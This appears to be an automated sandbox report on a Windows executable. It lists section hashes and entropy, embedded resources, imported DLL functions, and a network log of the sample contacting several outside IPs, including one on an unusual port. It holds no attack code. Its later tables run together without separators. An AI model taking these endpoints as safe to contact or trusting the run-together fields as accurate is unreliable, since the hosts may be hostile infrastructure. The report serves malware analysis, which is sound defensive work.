| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x7f7c0 | 0x7f800 | a7d57b7d9e7b1994ec5470ae7229cd2d | False | 0.4946997549019608 | zlib compressed data | 6.311975084207791 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x81000 | 0x2f948 | 0x2fa00 | f46b3ca44f6c1aea7e59564f52494ddc | False | 0.2865506069553806 | data | 4.618225905174831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xb1000 | 0x1ed2970 | 0x1ecc400 | f39d5bd6306e5ec255a4cc1d60976d0c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x1f84000 | 0x96d8 | 0x9800 | 750c5041957e88c08b0d0d51b62ce8b5 | False | 0.4538445723684211 | data | 5.746289077799479 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1f8e000 | 0x12d30 | 0x12e00 | bdb6276c500950cd7f39c21191b247d0 | False | 0.3001215852649007 | data | 4.701905284524863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_CURSOR | 0x1f8f618 | 0x134 | data | English | United States | 0.39935064935064934 |
| RT_CURSOR | 0x1f8f74c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x1f8f880 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7 |
| RT_CURSOR | 0x1f8f934 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365 |
| RT_CURSOR | 0x1f8fa68 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715 |
| RT_CURSOR | 0x1f8fb9c | 0x134 | data | English | United States | 0.37337662337662336 |
| RT_CURSOR | 0x1f8fcd0 | 0x134 | data | English | United States | 0.37662337662337664 |
| RT_CURSOR | 0x1f8fe04 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687 |
| RT_CURSOR | 0x1f8ff38 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664 |
| RT_CURSOR | 0x1f9006c | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687 |
| RT_CURSOR | 0x1f901a0 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x1f902d4 | 0x134 | data | English | United States | 0.44155844155844154 |
| RT_CURSOR | 0x1f90408 | 0x134 | data | English | United States | 0.4155844155844156 |
| RT_CURSOR | 0x1f9053c | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922 |
| RT_CURSOR | 0x1f90670 | 0x134 | data | English | United States | 0.2662337662337662 |
| RT_CURSOR | 0x1f907a4 | 0x134 | data | English | United States | 0.2824675324675325 |
| RT_CURSOR | 0x1f908d8 | 0x134 | data | English | United States | 0.3246753246753247 |
| RT_CURSOR | 0x1f90a0c | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.4025974025974026 |
| RT_CURSOR | 0x1f90b40 | 0xb4 | data | English | United States | 0.55 |
| RT_BITMAP | 0x1f90bf4 | 0x1a48 | Device independent bitmap graphic, 550 x 24 x 4, image size 6624 | English | United States | 0.20228894173602854 |
| RT_BITMAP | 0x1f9263c | 0x1c68 | Device independent bitmap graphic, 448 x 32 x 4, image size 7168 | English | United States | 0.3363586358635864 |
| RT_BITMAP | 0x1f942a4 | 0x2468 | Device independent bitmap graphic, 576 x 32 x 4, image size 9216 | English | United States | 0.3572961373390558 |
| RT_BITMAP | 0x1f9670c | 0x768 | Device independent bitmap graphic, 224 x 16 x 4, image size 1792 | English | United States | 0.15664556962025317 |
| RT_BITMAP | 0x1f96e74 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346 |
| RT_BITMAP | 0x1f96f2c | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965 |
| RT_ICON | 0x1f97070 | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 7296 | English | United States | 0.770174482006543 |
| RT_ICON | 0x1f98d18 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.37768817204301075 |
| RT_ICON | 0x1f99000 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325 |
| RT_MENU | 0x1f99128 | 0x12e | data | English | United States | 0.5827814569536424 |
| RT_MENU | 0x1f99258 | 0xd48 | data | English | United States | 0.3552941176470588 |
| RT_MENU | 0x1f99fa0 | 0x64 | Matlab v4 mat-file (little endian) o, numeric, rows 7340176, columns 7340143 | English | United States | 0.84 |
| RT_DIALOG | 0x1f9a004 | 0x33c | data | English | United States | 0.5169082125603864 |
| RT_DIALOG | 0x1f9a340 | 0x3ba | data | English | United States | 0.46540880503144655 |
| RT_DIALOG | 0x1f9a6fc | 0x1d6 | data | English | United States | 0.5574468085106383 |
| RT_DIALOG | 0x1f9a8d4 | 0x1ca | data | English | United States | 0.5589519650655022 |
| RT_DIALOG | 0x1f9aaa0 | 0x222 | data | English | United States | 0.5183150183150184 |
| RT_DIALOG | 0x1f9acc4 | 0x538 | data | English | United States | 0.3787425149700599 |
| RT_DIALOG | 0x1f9b1fc | 0x540 | data | English | United States | 0.3757440476190476 |
| RT_DIALOG | 0x1f9b73c | 0x554 | data | English | United States | 0.3951612903225806 |
| RT_DIALOG | 0x1f9bc90 | 0x550 | data | English | United States | 0.3963235294117647 |
| RT_DIALOG | 0x1f9c1e0 | 0x366 | data | English | United States | 0.46436781609195404 |
| RT_DIALOG | 0x1f9c548 | 0x1c6 | data | English | United States | 0.5969162995594713 |
| RT_DIALOG | 0x1f9c710 | 0x2a0 | data | English | United States | 0.4955357142857143 |
| RT_DIALOG | 0x1f9c9b0 | 0xe8 | data | English | United States | 0.6336206896551724 |
| RT_DIALOG | 0x1f9ca98 | 0x1a2 | data | English | United States | 0.4688995215311005 |
| RT_DIALOG | 0x1f9cc3c | 0x15a | data | English | United States | 0.5057803468208093 |
| RT_DIALOG | 0x1f9cd98 | 0x34 | data | English | United States | 0.9038461538461539 |
| RT_STRING | 0x1f9cdcc | 0xcc | data | English | United States | 0.39215686274509803 |
| RT_STRING | 0x1f9ce98 | 0x4e | data | English | United States | 0.6410256410256411 |
                                                                                                                                                                                                  RT_STRING0x1f9cee80xd6dataEnglishUnited States0.5233644859813084
                                                                                                                                                                                                  RT_STRING0x1f9cfc00xd0dataEnglishUnited States0.6346153846153846
                                                                                                                                                                                                  RT_STRING0x1f9d0900x4bedataEnglishUnited States0.30065897858319607
                                                                                                                                                                                                  RT_STRING0x1f9d5500x44adataEnglishUnited States0.27140255009107467
                                                                                                                                                                                                  RT_STRING0x1f9d99c0x150Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0EnglishUnited States0.4851190476190476
                                                                                                                                                                                                  RT_STRING0x1f9daec0xa0dataEnglishUnited States0.55
                                                                                                                                                                                                  RT_STRING0x1f9db8c0x150dataEnglishUnited States0.2976190476190476
                                                                                                                                                                                                  RT_STRING0x1f9dcdc0x62dataEnglishUnited States0.3469387755102041
                                                                                                                                                                                                  RT_STRING0x1f9dd400x3adataEnglishUnited States0.6551724137931034
                                                                                                                                                                                                  RT_STRING0x1f9dd7c0x2aedataEnglishUnited States0.3556851311953353
                                                                                                                                                                                                  RT_STRING0x1f9e02c0x260dataEnglishUnited States0.0805921052631579
                                                                                                                                                                                                  RT_STRING0x1f9e28c0x330dataEnglishUnited States0.3492647058823529
                                                                                                                                                                                                  RT_STRING0x1f9e5bc0x27cdataEnglishUnited States0.33176100628930816
                                                                                                                                                                                                  RT_STRING0x1f9e8380x106dataEnglishUnited States0.5763358778625954
                                                                                                                                                                                                  RT_STRING0x1f9e9400xdadataEnglishUnited States0.43119266055045874
                                                                                                                                                                                                  RT_STRING0x1f9ea1c0x46dataEnglishUnited States0.7428571428571429
                                                                                                                                                                                                  RT_STRING0x1f9ea640xc6dataEnglishUnited States0.41919191919191917
                                                                                                                                                                                                  RT_STRING0x1f9eb2c0x1f8dataEnglishUnited States0.36706349206349204
                                                                                                                                                                                                  RT_STRING0x1f9ed240xaedataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                  RT_STRING0x1f9edd40xd0StarOffice Gallery theme p, 1929408256 objects, 1st pEnglishUnited States0.6394230769230769
                                                                                                                                                                                                  RT_STRING0x1f9eea40x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                  RT_STRING0x1f9eed00x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                  RT_STRING0x1f9f0540x124dataEnglishUnited States0.4897260273972603
                                                                                                                                                                                                  RT_STRING0x1f9f1780x4e6dataEnglishUnited States0.37719298245614036
                                                                                                                                                                                                  RT_STRING0x1f9f6600x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                  RT_STRING0x1f9f8c40x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                  RT_STRING0x1f9fba00x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                  RT_STRING0x1f9fc2c0xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                  RT_STRING0x1f9fcd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                  RT_STRING0x1f9fdb80x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                  RT_STRING0x1fa02600x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                  RT_STRING0x1fa04880x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                  RT_STRING0x1fa04b40x42dataEnglishUnited States0.6060606060606061
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa04f80x88dataEnglishUnited States0.6911764705882353
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa05800x230dataEnglishUnited States0.5285714285714286
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa07b00x18dataEnglishUnited States1.2083333333333333
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa07c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa07dc0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08000x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa084c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa089c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_ICON0x1fa093c0x14dataEnglishUnited States1.15
                                                                                                                                                                                                  RT_GROUP_ICON0x1fa09500x22dataEnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_VERSION0x1fa09740xdcdataEnglishUnited States0.6590909090909091
                                                                                                                                                                                                  RT_MANIFEST0x1fa0a500x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                                                                                                                                                                                                  None0x1fa0bb80x64SysEx File - OctavePlateauEnglishUnited States0.79
                                                                                                                                                                                                  None0x1fa0c1c0x71dataEnglishUnited States0.45132743362831856
                                                                                                                                                                                                  None0x1fa0c900x40dataEnglishUnited States1.0625
                                                                                                                                                                                                  None0x1fa0cd00x2adataEnglishUnited States1.0952380952380953
                                                                                                                                                                                                  None0x1fa0cfc0x34dataEnglishUnited States1.0576923076923077
DLL: Import
KERNEL32.dll: IsDebuggerPresent, RtlVirtualUnwind, RtlCaptureContext, GetACP, IsValidCodePage, EncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, GetStdHandle, HeapSetInformation, HeapCreate, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetUnhandledExceptionFilter, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, UnhandledExceptionFilter, TerminateProcess, HeapSize, HeapQueryInformation, ExitProcess, Sleep, RtlPcToFileHeader, RaiseException, RtlUnwindEx, RtlLookupFunctionEntry, GetStartupInfoA, GetCommandLineA, HeapReAlloc, HeapAlloc, HeapFree, GetFileSizeEx, LocalFileTimeToFileTime, GetFileAttributesExA, SetErrorMode, GetCurrentDirectoryA, FileTimeToLocalFileTime, GetOEMCP, GetCPInfo, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, GlobalHandle, GlobalReAlloc, TlsAlloc, InitializeCriticalSection, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GetModuleHandleW, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFlags, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetShortPathNameA, GetFullPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, lstrcmpiA, GetThreadLocale, GetStringTypeExA, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetCurrentProcessId, lstrcmpA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GetModuleFileNameW, GetProfileIntA, GetTickCount, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, CompareStringA, FreeLibrary, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MultiByteToWideChar, GlobalFree, FreeResource, GetModuleFileNameA, lstrcpynA, GlobalAlloc, MulDiv, GetProcAddress, GetModuleHandleA, LoadLibraryA, GetLastError, SetLastError, FindClose, MoveFileA, DeleteFileA, FindFirstFileA, WriteFile, GetTempFileNameA, lstrcatA, lstrcpyA, CloseHandle, ReadFile, CreateFileA, GetFileAttributesA, lstrlenA, GlobalUnlock, GlobalLock, FindResourceA, LoadResource, LockResource, SizeofResource, GetEnvironmentStringsW, WideCharToMultiByte
USER32.dll: CopyAcceleratorTableA, CreateMenu, PostThreadMessageA, GetTabbedTextExtentA, GetDCEx, LockWindowUpdate, DestroyIcon, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, GetClassLongPtrA, SetPropA, GetPropA, RemovePropA, GetFocus, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetWindowLongPtrA, SetWindowLongPtrA, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, PostMessageA, MessageBoxA, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, SetParent, SetScrollInfo, CopyRect, GetDlgCtrlID, PtInRect, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, SetWindowPos, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, GetWindow, GetMenuState, GetMenuStringA, AppendMenuA, InsertMenuA, GetMenuItemID, GetMenuItemCount, GetSubMenu, RemoveMenu, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowLongA, IsWindowEnabled, GetParent, GetNextDlgTabItem, EndDialog, ShowWindow, GetClipboardData, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, IsClipboardFormatAvailable, SetTimer, SetCapture, GetKeyState, TranslateAcceleratorA, LoadAcceleratorsA, KillTimer, ReleaseCapture, LoadCursorA, SetCursor, ScreenToClient, SendMessageA, EnableWindow, GetAsyncKeyState, GetSystemMenu, DeleteMenu, GetCursorPos, EnableScrollBar, GetDlgItem, ReleaseDC, GetDC, InvalidateRect, IsWindow, OffsetRect, GetSysColor, HideCaret, ShowCaret, SetCaretPos, CreateCaret, UpdateWindow, GetClientRect, SetWindowRgn, DrawIcon, UnregisterClassA, GetMenuItemInfoA, GetSysColorBrush, ShowOwnedPopups, CharUpperA, GetMessageA, TranslateMessage, ValidateRect, RegisterClipboardFormatA, GetScrollInfo, PostQuitMessage, WindowFromPoint, IsZoomed, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, IsRectEmpty, SetCursorPos, RedrawWindow, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, DestroyCursor, SetRect, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, InflateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, EnableMenuItem, DeferWindowPos, CheckMenuItem, UnpackDDElParam
GDI32.dll: DeleteDC, CreatePen, GetViewportOrgEx, Rectangle, PatBlt, GetStockObject, ExtTextOutA, CreateRectRgn, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, DeleteObject, CreatePatternBrush, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, ExcludeClipRect, IntersectClipRect, LineTo, MoveToEx, SetTextAlign, SelectClipRgn, GetViewportExtEx, GetWindowExtEx, GetPixel, PtVisible, RectVisible, TextOutA, Escape, EndDoc, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, CreateSolidBrush, GetTextMetricsA, GetCharWidthA, CreateFontA, StretchDIBits, GetBkColor, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextAlign, GetTextFaceA, GetTextExtentPointA, GetWindowOrgEx, SetAbortProc, AbortDoc, EndPage, StartPage, StartDocA, DPtoLP, CreateBitmap, SetBkColor, SetTextColor, GetClipBox, CreateDCA, CopyMetaFileA, GetDeviceCaps, GetObjectA, SelectObject, CreateCompatibleDC, CreateFontIndirectA, BitBlt, CreateCompatibleBitmap, GetTextExtentPoint32A
COMDLG32.dll: GetFileTitleA
WINSPOOL.DRV: DocumentPropertiesA, OpenPrinterA, GetJobA, ClosePrinter
ADVAPI32.dll: GetFileSecurityA, SetFileSecurityA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegCreateKeyExA, RegSetValueA, RegCloseKey, RegQueryValueA, RegOpenKeyExA, RegCreateKeyA
SHELL32.dll: ExtractIconA, DragAcceptFiles, ShellExecuteA, DragFinish, DragQueryFileA, SHGetFileInfoA, SHGetSpecialFolderPathA
SHLWAPI.dll: PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
oledlg.dll
ole32.dll: OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleTranslateAccelerator, CoInitializeEx, CoUninitialize, CreateStreamOnHGlobal, CoCreateInstance, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, OleGetClipboard, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoRegisterMessageFilter, CoRevokeClassObject, IsAccelerator
OLEAUT32.dll: VariantClear, VariantChangeType, VariantInit, SysAllocStringLen
OLEACC.dll: LresultFromObject, CreateStdAccessibleObject
Language of compilation system: English
Country where language is spoken: United States
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.694655895 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.080887079 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.143744946 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.301785946 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.422584057 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.935425043 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.007287025 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.102979898 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.128926992 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.225708961 CET53498738.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.230262041 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.257947922 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.258806944 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.258862019 CET44349875103.235.46.96192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.258972883 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.265132904 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.265180111 CET44349875103.235.46.96192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.265467882 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.266104937 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.266139984 CET44349876172.217.21.36192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.266194105 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.267024040 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.267051935 CET44349876172.217.21.36192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.267158985 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.378892899 CET53498738.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.378958941 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.447267056 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.447294950 CET4434987777.88.55.88192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.447407961 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.449040890 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.449084997 CET4434987777.88.55.88192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.449155092 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.572981119 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.573069096 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.753237963 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.753289938 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.753449917 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.759655952 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.759694099 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937076092 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937102079 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937688112 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937716007 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937727928 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937777042 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.938005924 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.938023090 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939181089 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939193964 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939239025 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939270020 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939282894 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.940715075 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.940735102 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.794049025 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.794140100 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.801450968 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.801552057 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.867151976 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.867168903 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.867306948 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.868263960 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.868277073 CET4434987913.227.9.159192.168.2.5
